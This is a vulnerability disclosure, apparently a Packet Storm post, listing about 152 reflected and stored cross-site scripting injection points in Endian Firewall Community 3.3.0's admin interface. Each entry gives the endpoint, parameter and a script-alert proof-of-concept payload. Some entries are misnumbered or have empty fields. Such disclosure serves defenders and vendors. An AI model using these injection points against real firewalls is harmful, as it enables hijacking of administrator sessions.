Endian Firewall Community release version 3.3.0 suffers from multiple cross site scripting vulnerabilities.
77efbdae60d700d9006292a6073020971d2b9a1fb71fff2e7ebb7addbe8101d3##################################################################################################################################
# Exploit Title: Endian Firewall Community release 3.3.0 | Cross-Site
Scripting
# Date: 24.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.endian.com
# Software Link:
https://sourceforge.net/projects/efw/files/Development/EFW-3.3.0/
# Version: 3.3.0
##################################################################################################################################
Introduction
Endian Firewall Community (EFW) is a turn-key Linux based security software
product designed for home that can transform any unused hardware appliance
into a full-featured Unified Threat Management (UTM) solution. Endian
Community is designed to make security simple and help protect home
networks by using the power of Open Source.
#################################################################################
XSS details: Reflected & Stored
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDRESS
PAYLOAD
<script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_NETMASK
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
DISPLAY_GREEN_ADDITIONAL
PAYLOAD
<script>alert(3)</script>
#################################################################################
XSS4 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MTU
PAYLOAD
<script>alert(4)</script>
#################################################################################
XSS5 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAC
PAYLOAD
<script>alert(5)</script>
#################################################################################
XSS6 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_ADMINMAIL
PAYLOAD
<script>alert(6)</script>
#################################################################################
XSS7 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_MAILFROM
PAYLOAD
<script>alert(7)</script>
#################################################################################
XSS8 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/netwizard.cgi
METHOD
Post
PARAMETER
MAIN_SMARTHOST
PAYLOAD
<script>alert(8)</script>
#################################################################################
XSS9 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_ADDRESS
PAYLOAD
"><script>alert(9)</script>
#################################################################################
XSS10 | Stored
URL
https://192.168.2.200:10443/manage/notifications/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
"><script>alert(10)</script>
#################################################################################
XSS11 | Stored
URL
https://192.168.2.200:10443/manage/password/web/?ACTION=edit&CONTROLLERNAME=&ID=2
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(11)</script>
#################################################################################
XSS12 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(12)</script>
#################################################################################
XSS13 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
"><script>alert(13)</script>
#################################################################################
XSS14 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(14)</script>
#################################################################################
XSS15 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(15)</script>
#################################################################################
XSS16 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(16)</script>
#################################################################################
XSS17 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(17)</script>
#################################################################################
XSS18 | Reflected
URL
https://192.168.2.200:10443/manage/gui/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(18)</script>
#################################################################################
XSS19 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_RCPTTO
PAYLOAD
"><script>alert(19)</script>
#################################################################################
XSS20 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_MAILFROM
PAYLOAD
"><script>alert(20)</script>
#################################################################################
XSS21 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/backupschedule.cgi
METHOD
Post
PARAMETER
BACKUP_SMARTHOST
PAYLOAD
"><script>alert(21)</script>
#################################################################################
XSS22 | Stored
URL
https://192.168.2.200:10443/manage/dnsmasq/hosts/?ACTION=edit&CONTROLLERNAME=hosts&ID=1
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(22)</script>
#################################################################################
XSS23 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(23)</script>
#################################################################################
XSS24 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(24)</script>
#################################################################################
XSS25 | Reflected
URL
METHOD
PARAMETER
PAYLOAD
"><script>alert(25)</script>
#################################################################################
XSS26 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(26)</script>
#################################################################################
XSS27 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(27)</script>
#################################################################################
XSS28 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/policy_routing.cgi
METHOD
Post
PARAMETER
port
PAYLOAD
"><script>alert(28)</script>
#################################################################################
XSS29 | Stored
URL
https://192.168.2.200:10443/cgi-bin/uplinkeditor.cgi
METHOD
Post
PARAMETER
NAME
PAYLOAD
"><script>alert(29)</script>
#################################################################################
XSS30 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vlanconfig.cgi
METHOD
Post
PARAMETER
DEVICE
PAYLOAD
"><script>alert(30)</script>
#################################################################################
XSS31 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_GREEN
PAYLOAD
"><script>alert(31)</script>
#################################################################################
XSS32 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_GREEN
PAYLOAD
"><script>alert(32)</script>
#################################################################################
XSS33 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_GREEN
PAYLOAD
"><script>alert(33)</script>
#################################################################################
XSS34 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_ORANGE
PAYLOAD
"><script>alert(34)</script>
#################################################################################
XSS35 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_ORANGE
PAYLOAD
"><script>alert(35)</script>
#################################################################################
XSS36 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_ORANGE
PAYLOAD
"><script>alert(36)</script>
#################################################################################
XSS37 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DEFAULT_LEASE_TIME_BLUE
PAYLOAD
"><script>alert(37)</script>
#################################################################################
XSS38 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
MAX_LEASE_TIME_BLUE
PAYLOAD
"><script>alert(38)</script>
#################################################################################
XSS39 | Stored
URL
https://192.168.2.200:10443/manage/dhcp/settings/
METHOD
Post
PARAMETER
DOMAIN_NAME_BLUE
PAYLOAD
"><script>alert(39)</script>
#################################################################################
XSS40 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(40)</script>
#################################################################################
XSS41 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
filename
PAYLOAD
"><script>alert(41)</script>
#################################################################################
XSS42 | Reflected
URL
https://192.168.2.200:10443/manage/dhcp/fixed_leases/
METHOD
Post
PARAMETER
root_path
PAYLOAD
"><script>alert(42)</script>
#################################################################################
XSS43 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/time.cgi
METHOD
Post
PARAMETER
NTP_SERVER_LIST
PAYLOAD
"><script>alert(43)</script>
#################################################################################
XSS44 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(44)</script>
#################################################################################
XSS45 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
host
PAYLOAD
"><script>alert(45)</script>
#################################################################################
XSS46 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
user
PAYLOAD
"><script>alert(46)</script>
#################################################################################
XSS3 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
ham
PAYLOAD
"><script>alert(47)</script>
#################################################################################
XSS48 | Stored
URL
https://192.168.2.200:10443/cgi-bin/salearn.cgi
METHOD
Post
PARAMETER
spam
PAYLOAD
"><script>alert(48)</script>
#################################################################################
XSS49 | Reflected
URL
https://192.168.2.200:10443/manage/qos/devices/
METHOD
Post
PARAMETER
device
PAYLOAD
"><script>alert(49)</script>
#################################################################################
XSS50 | Reflected
URL
https://192.168.2.200:10443/manage/qos/classes/
METHOD
Post
PARAMETER
name
PAYLOAD
"><script>alert(50)</script>
#################################################################################
XSS51 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
protocol
PAYLOAD
"><script>alert(51)</script>
#################################################################################
XSS52 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
dscp
PAYLOAD
"><script>alert(52)</script>
#################################################################################
XSS53 | Reflected
URL
https://192.168.2.200:10443/manage/qos/rules/
METHOD
Post
PARAMETER
comment
PAYLOAD
"><script>alert(53)</script>
#################################################################################
XSS54 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/dnat.cgi
METHOD
Post
PARAMETER
target_ip_ip
PAYLOAD
"><script>alert(54)</script>
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(55)</script>
#################################################################################
XSS56 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/snat.cgi
METHOD
Post
PARAMETER
snat_to_ip
PAYLOAD
"><script>alert(56)</script>
#################################################################################
XSS57 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
destination
PAYLOAD
"><script>alert(57)</script>
#################################################################################
XSS58 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(58)</script>
#################################################################################
XSS59 | Stored
URL
https://192.168.2.200:10443/cgi-bin/incoming.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(59)</script>
#################################################################################
XSS60 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(60)</script>
#################################################################################
XSS61 | Stored
URL
https://192.168.2.200:10443/cgi-bin/outgoingfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(61)</script>
#################################################################################
XSS62 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(62)</script>
#################################################################################
XSS63 | Stored
URL
https://192.168.2.200:10443/cgi-bin/zonefw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(63)</script>
#################################################################################
XSS64 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
source
PAYLOAD
"><script>alert(64)</script>
#################################################################################
XSS65 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(65)</script>
#################################################################################
XSS66 | Stored
URL
https://192.168.2.200:10443/cgi-bin/vpnfw.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(66)</script>
#################################################################################
XSS67 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
target
PAYLOAD
"><script>alert(67)</script>
#################################################################################
XSS68 | Stored
URL
https://192.168.2.200:10443/cgi-bin/xtaccess.cgi
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(68)</script>
#################################################################################
XSS69 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
PROXY_PORT
PAYLOAD
"><script>alert(69)</script>
#################################################################################
XSS70 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
VISIBLE_HOSTNAME
PAYLOAD
"><script>alert(70)</script>
#################################################################################
XSS71 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
ADMIN_MAIL_ADDRESS
PAYLOAD
"><script>alert(71)</script>
#################################################################################
XSS72 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
"><script>alert(72)</script>
#################################################################################
XSS73 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
"><script>alert(73)</script>
#################################################################################
XSS74 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_SIZE
PAYLOAD
"><script>alert(74)</script>
#################################################################################
XSS75 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
CACHE_MEM
PAYLOAD
"><script>alert(75)</script>
#################################################################################
XSS76 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
MAX_SIZE
PAYLOAD
"><script>alert(76)</script>
#################################################################################
XSS77 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyconfig.cgi
METHOD
Post
PARAMETER
DST_NOCACHE
PAYLOAD
"><script>alert(77)</script>
#################################################################################
XSS78 | Stored
URL
https://192.168.2.200:10443/cgi-bin/proxypolicy.cgi
METHOD
Post
PARAMETER
filtertype
PAYLOAD
"><script>alert(78)</script>
#################################################################################
XSS79 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CHILDREN
PAYLOAD
"><script>alert(79)</script>
#################################################################################
XSS80 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_MAX_USERIP
PAYLOAD
"><script>alert(80)</script>
#################################################################################
XSS81 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_CACHE_TTL
PAYLOAD
"><script>alert(81)</script>
#################################################################################
XSS82 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
AUTH_IPCACHE_TTL
PAYLOAD
"><script>alert(82)</script>
#################################################################################
XSS83 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/proxyauth.cgi
METHOD
Post
PARAMETER
NCSA_MIN_PASS_LEN
PAYLOAD
"><script>alert(83)</script>
#################################################################################
XSS84 | Reflected
URL
https://192.168.2.200:10443/manage/proxy/adjoin/
METHOD
Post
PARAMETER
ADMIN_USER
PAYLOAD
"><script>alert(84)</script>
#################################################################################
XSS85 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_SOURCE_BYPASS
PAYLOAD
"><script>alert(85)</script>
#################################################################################
XSS86 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/frox.cgi
METHOD
Post
PARAMETER
TRANSPARENT_DESTINATION_BYPASS
PAYLOAD
"><script>alert(86)</script>
#################################################################################
XSS87 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
VIRUS_ADMIN
PAYLOAD
"><script>alert(87)</script>
#################################################################################
XSS88 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
NOTIFICATION_SENDER
PAYLOAD
"><script>alert(88)</script>
#################################################################################
XSS89 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_SOURCE
PAYLOAD
"><script>alert(89)</script>
#################################################################################
XSS90 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtpconfig.cgi
METHOD
Post
PARAMETER
BYPASS_DESTINATION
PAYLOAD
"><script>alert(90)</script>
#################################################################################
XSS91 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_WHITELIST
PAYLOAD
"><script>alert(91)</script>
#################################################################################
XSS92 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_WHITELIST
PAYLOAD
"><script>alert(92)</script>
#################################################################################
XSS93 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_WHITELIST
PAYLOAD
"><script>alert(93)</script>
#################################################################################
XSS94 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SENDER_BLACKLIST
PAYLOAD
"><script>alert(94)</script>
#################################################################################
XSS95 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
RECIPIENT_BLACKLIST
PAYLOAD
"><script>alert(95)</script>
#################################################################################
XSS96 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
CLIENT_BLACKLIST
PAYLOAD
"><script>alert(96)</script>
#################################################################################
XSS97 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_RECIPIENT
PAYLOAD
"><script>alert(97)</script>
#################################################################################
XSS98 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
WHITELIST_CLIENT
PAYLOAD
"><script>alert(98)</script>
#################################################################################
XSS99 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_WHITELIST
PAYLOAD
"><script>alert(99)</script>
#################################################################################
XSS100 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtplists.cgi
METHOD
Post
PARAMETER
SPAM_BLACKLIST
PAYLOAD
"><script>alert(100)</script>
#################################################################################
XSS101 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
DOMAIN
PAYLOAD
"><script>alert(101)</script>
#################################################################################
XSS102 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtpdomains.cgi
METHOD
Post
PARAMETER
SERVER
PAYLOAD
"><script>alert(102)</script>
#################################################################################
XSS103 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
domain
PAYLOAD
"><script>alert(103)</script>
#################################################################################
XSS104 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_address
PAYLOAD
"><script>alert(104)</script>
#################################################################################
XSS105 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/domainrouting/
METHOD
Post
PARAMETER
smarthost_username
PAYLOAD
"><script>alert(105)</script>
#################################################################################
XSS106 | Stored
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
ADDRESS
PAYLOAD
"><script>alert(106)</script>
#################################################################################
XSS107 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/smtprouting.cgi
METHOD
Post
PARAMETER
BCC
PAYLOAD
"><script>alert(107)</script>
#################################################################################
XSS108 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMARTHOST_USERNAME
PAYLOAD
"><script>alert(108)</script>
#################################################################################
XSS109 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
AUTH_DAEMONS
PAYLOAD
"><script>alert(109)</script>
#################################################################################
XSS110 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
IMAP_AUTH_SERVER
PAYLOAD
#################################################################################
XSS111 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTP_HELO_NAME
PAYLOAD
"><script>alert(111)</script>
#################################################################################
XSS112 | Stored
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
ALWAYS_BCC_ADDRESS
PAYLOAD
"><script>alert(112)</script>
#################################################################################
XSS113 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
MAILTEMPLATE_LANGUAGE
PAYLOAD
"><script>alert(113)</script>
#################################################################################
XSS114 | Reflected
URL
https://192.168.2.200:10443/manage/smtpscan/advanced/
METHOD
Post
PARAMETER
SMTPD_HARD_ERROR_LIMIT
PAYLOAD
"><script>alert(114)</script>
#################################################################################
XSS115 | Reflected
URL
https://192.168.2.200:10443/manage/dnsmasq/localdomains/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(115)</script>
#################################################################################
XSS116 | Reflected
URL
https://192.168.2.200:10443/manage/openvpn/
METHOD
Post
PARAMETER
reneg_sec
PAYLOAD
"><script>alert(116)</script>
#################################################################################
XSS55 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(117)</script>
#################################################################################
XSS118 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
secret
PAYLOAD
"><script>alert(118)</script>
#################################################################################
XSS119 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(119)</script>
#################################################################################
XSS120 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_email
PAYLOAD
"><script>alert(120)</script>
#################################################################################
XSS121 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(121)</script>
#################################################################################
XSS122 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
"><script>alert(122)</script>
#################################################################################
XSS123 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(123)</script>
#################################################################################
XSS124 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(124)</script>
#################################################################################
XSS125 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(125)</script>
#################################################################################
XSS126 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(126)</script>
#################################################################################
XSS127 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
local_peerid
PAYLOAD
"><script>alert(127)</script>
#################################################################################
XSS128 | Reflected
URL
https://192.168.2.200:10443/manage/ipsec/
METHOD
Post
PARAMETER
remote_peerid
PAYLOAD
"><script>alert(128)</script>
#################################################################################
XSS129 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
name
PAYLOAD
"><script>alert(129)</script>
#################################################################################
XSS130 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
remark
PAYLOAD
"><script>alert(130)</script>
#################################################################################
XSS131 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
new_cert_days
PAYLOAD
"><script>alert(131)</script>
#################################################################################
XSS132 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(132)</script>
#################################################################################
XSS133 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_department
PAYLOAD
"><script>alert(133)</script>
#################################################################################
XSS134 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_organization
PAYLOAD
"><script>alert(134)</script>
#################################################################################
XSS135 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_city
PAYLOAD
"><script>alert(135)</script>
#################################################################################
XSS136 | Reflected
URL
https://192.168.2.200:10443/manage/vpnauthentication/user/
METHOD
Post
PARAMETER
user_state
PAYLOAD
"><script>alert(136)</script>
#################################################################################
XSS137 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_name
PAYLOAD
"><script>alert(137)</script>
#################################################################################
XSS138 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_ou
PAYLOAD
"><script>alert(138)</script>
#################################################################################
XSS139 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_organization
PAYLOAD
"><script>alert(139)</script>
#################################################################################
XSS140 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_city
PAYLOAD
"><script>alert(140)</script>
#################################################################################
XSS141 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
new_cert_state
PAYLOAD
"><script>alert(141)</script>
#################################################################################
XSS142 | Reflected
URL
https://192.168.2.200:10443/manage/ca/certificate/
METHOD
Post
PARAMETER
upload_cert_req_days
PAYLOAD
"><script>alert(142)</script>
#################################################################################
XSS143 | Stored
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(143)</script>
#################################################################################
XSS144 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_log.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
"><script>alert(144)</script>
#################################################################################
XSS145 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_ids.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(145)</script>
#################################################################################
XSS146 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_openvpn.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(146)</script>
#################################################################################
XSS147 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_clamav.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(147)</script>
#################################################################################
XSS148 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(148)</script>
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_firewall.cgi
METHOD
Post
PARAMETER
OFFSET
PAYLOAD
"><script>alert(148)</script>
#################################################################################
XSS149 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_proxy.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(149)</script>
#################################################################################
XSS150 | Reflected
URL
https://192.168.2.200:10443/cgi-bin/logs_smtp.cgi
METHOD
Post
PARAMETER
DATE
PAYLOAD
"><script>alert(150)</script>
#################################################################################
XSS151 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_USERNAME
PAYLOAD
"><script>alert(151)</script>
#################################################################################
XSS152 | Stored
URL
https://192.168.2.200:10443/manage/opentsa/
METHOD
Post
PARAMETER
HTTP_PASSWORD
PAYLOAD
"><script>alert(152)</script>
#################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed